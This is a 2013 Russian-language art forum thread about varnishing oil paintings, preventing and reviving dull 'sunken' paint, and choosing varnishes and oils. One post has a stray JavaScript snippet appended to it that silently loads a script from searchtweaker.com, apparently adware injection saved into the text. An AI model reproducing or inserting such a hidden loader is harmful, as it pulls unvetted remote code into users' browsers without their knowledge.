Ваша корзинаИзбранное Личный кабинет

Сочетание лаков и масляных красок, борьба с пожуханием, последствия

07.01.2013,
22:57
Albert Nihil

Цитата:
Сообщение от Александр Дементьев
А ведь если бы он написал их пастелью, с них бы и волоска не упало, при идеальных-то условиях ))).


Тллько хардкор!Только графический планшет! :-)

07.01.2013,
23:55
kazakova
kazakova


Цитата:
Сообщение от Vezeleva Tatiana
А вообще странно что художнику запах лака важнее чем его качества...



мне есть с чем сравнивать Были старые запасы акрил-фисташкового лака - подарок от одного художника. Лак и сох быстро и запах был терпимый. А новый акрил-стирольный - ужасно воняет, а не пахнет, правда, сохнет быстро.

Так что любителям побыстрее и поострее - в самый раз будет.

08.01.2013,
01:12
Владимир Рогов
Владимир Рогов

Цитата:
Сообщение от Albert Nihil
Тллько хардкор!Только графический планшет! :-)


плюс электрификация всей страны :))

08.01.2013,
01:25
ksy
ksy

Цитата:
Сообщение от Albert Nihil
Тллько хардкор!Только графический планшет! :-)

Ага! Цифра бессмертна!

08.01.2013,
01:36
Александр Дементьев
Александр Дементьев

смеетесь? Железо ржавеет! ))).

08.01.2013,
01:39
ksy
ksy

Цитата:
Сообщение от Александр Дементьев
смеетесь? Железо ржавеет! ))).

Александр, диски пластиковые))

09.01.2013,
15:12
Александр Дементьев
Александр Дементьев


Пластмассовый мир победил
Макет оказался сильней
Последний кораблик остыл
Последний фонарик устал
Кому нужен ломтик июльского неба...

09.01.2013,
17:43
Albert Nihil


Цитата:
Сообщение от Александр Дементьев
Последний фонарик устал Кому нужен ломтик июльского неба...


Отвечу словами того же автора:
но я ещё соберу и приклею отбитые части тела(с)
А если серьёзно,то например, среди дизайнеров интерьера наибольшую ценность представляют именно вручную сделанные эскизы."Ручная подача" они это называют.
В книге Артемия Лебедева "Ководство" есть пример -- перспектива улицы,сделанная в компьютерной программе.Все вертикальные линии наклонены.И он сетует -- вот мол раньше,архитекторы вручную делали,линии прямыми были.
Я 10 лет потратил на разные программы.Не было такой радости от занятий,как сейчас,когда я вновь решил вернуться к своим картинкам,масляным краскам.
Форум классный,очень много нового для себя каждый день узнаю,по поисковым словам.

16.08.2013,
15:34
artlive24

Написал картину маслом на холсте и через некоторое время краска пожухла - исчезла яркость. Каким лаком и как покрывать работу, чтобы восстановить яркость и цвет?

16.08.2013,
18:30
aurora-s
aurora-s

А картину лаком покрывали?

16.08.2013,
18:32
aurora-s
aurora-s


Я имела ввиду - финишным лаком работу покрывали? Я, когда работу долго пишу, ещё покрываю недописанную работу ретушным лаком, а по окончании работы, спустя 1 год, покрываю финишным лаком.
Ретушные лаки м финишные лаки есть разные - разного производителя, разной глянцевости-матовости, разной цены.

16.08.2013,
22:03
artlive24


aurora-s, нет, никиким не покрывал. Работа уже полностью высохла и стала блеклой.
1)Кроме финишного(он так и называется в магазине?) можно ли даммарным лаком(невская палитра) покрыть готовую работу?
2) Ретушный лак для чего используете?

16.08.2013,
23:28
aurora-s
aurora-s


Финишный лак - это лак, покрывающий оконченную, высохшую работу (я покрываю картины примерно через 1 год). Финишный лак может быть как даммарный, так и не дамарный. Мне отечественный дамарный не нравится - долго сохнет, сильно воняет, ну и результат не нравится. Итальянский дамарный лак FERRARIO намного лучше - сохнет быстрее, покрывает ровнее и не так воняет. Я выбрала для себя матовый финишный лак от MAIMERI (Италия) - сохнет буквально несколько часов, почти не воняет и очень оживляет цвет - это не дамарный лак.
ретушный лак я использую когда работа долго (полгода и дольше) стоИт незаконченной. И прежде чем продолжить работу я покрываю работу ретушным лаком - он освежает и оживляет цвета, а так же улучшает сцепление нижних, высохших, слоёв краски с новыми слоями.

31.08.2013,
16:29
asya.art

Fortune

А всё таки ЛАК ОБЯЗАТЕЛЕН ДЛЯ готовой работы или НЕТ? Кто-нить ответит?

Опытные люди говорят, что если картину покрыть лаком, то он лет через 20-30 растрескивается. Но, если картина сильно прожухла, то её надо покрыть лаком. Каким - тут уже писали. А для начала попробуйте протереть половинкой сырой луковицы - она тоже немного освежает цвета. А не удастся - тогда лаком.

31.08.2013,
20:48
ВАСИЛЬ82
ВАСИЛЬ82


Чтобы не жухла соблюдайте технологию.
Покрывать лаком только спустя год!!!, чтоб всё хорошо просохло.Лак в основном защита от пыли, грязи, влаги , и конечно он выравнивает цвета. Можно добавлять лак в масло но опять же нужно соблюдать технологию, а то может потрескаться скукожыться осыпаться и тп.
Что как применять хорошо Киплик описал.Изучите его основательно и выберите для себя подходящий стиль письма , и будет вам счастье.
К стати лаковое покрытие очень не скоро крекалюром пойдёт и если всё хорошо сделаете, то это станет проблемой реставратара
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

02.09.2013,
02:56
Александр Дементьев
Александр Дементьев

Василь, а вы какими красками работаете?

11.09.2013,
15:49
Лена Н

По-моему, эта проблема из ряда тех, с которыми приходится мириться , причем она касалась живописцев во все времена. Пожухание, конечно, портит впечатление, но ...... Это естественная взаимодействие материалов.

21.09.2013,
17:59
Александр Дементьев
Александр Дементьев

эта проблема вполне решается.

23.09.2013,
19:32
Ambrosius


Александр, там на российском рынке вполне нормальное масло появилось у Невской Палитры (на картинке внизу - Масло льняное уплотненное №2).
Вполне пригодное. А то, что не такое густое, как импортное, так даже и хорошо - с ним в каком-то смысле легче работать.

23.09.2013,
23:05
Александр Дементьев
Александр Дементьев


Михаил, привет! пользовался, знаю. Действительно предотвращает пожухания.. Вообще, сейчас беру холсты у местного мастера - лен 100%, загрунтованы этой краской: http://www.teks.ru/view/90/ . Даже с неуплотненным маслом краски не жухнут. Не знаю по поводу долговечности грунта, но хочется верить, что хороший.
О густых маслах, из последних открытий - краска Белый барит из серии Rublev. Очень прозрачные белила пергаментного цвета, на ореховом и льняном маслах тянущейся медовой консистенции. При смешивании с другой краской очень интересная техника письма вомзожна.


Для того, чтобы оставлять сообщения в форуме, нужно авторизоваться.
Комарова Елена
Измайловский парк
Комарова Елена. Измайловский парк
250000 р.
Блажиевская Мария
1 января
Блажиевская Мария. 1 января
18000 р.
Полуян Елена
Чистые пруды
Полуян Елена. Чистые пруды
55000 р.
Добровольская Гаянэ
Китайская яблоня в цвету
Добровольская Гаянэ. Китайская яблоня в цвету
12500 р.
25000 р.
-50%
Чижова Виктория
Яркие сумерки
Чижова Виктория. Яркие сумерки
45000 р.
Припутникова Наталия
Рыбы
Припутникова Наталия. Рыбы
21800 р.

Новости культуры Практические советы Наши выставки Рейтинг художественных сайтов Политика защиты и обработки персональных данныхО нас, контакты info@artnow.ru

© ArtNow.ru 2003–2024 | Использование материалов, размещенных на сайте, допускается только с согласия их авторов с обязательной ссылкой на ArtNow.ru

Работа добавлена в корзину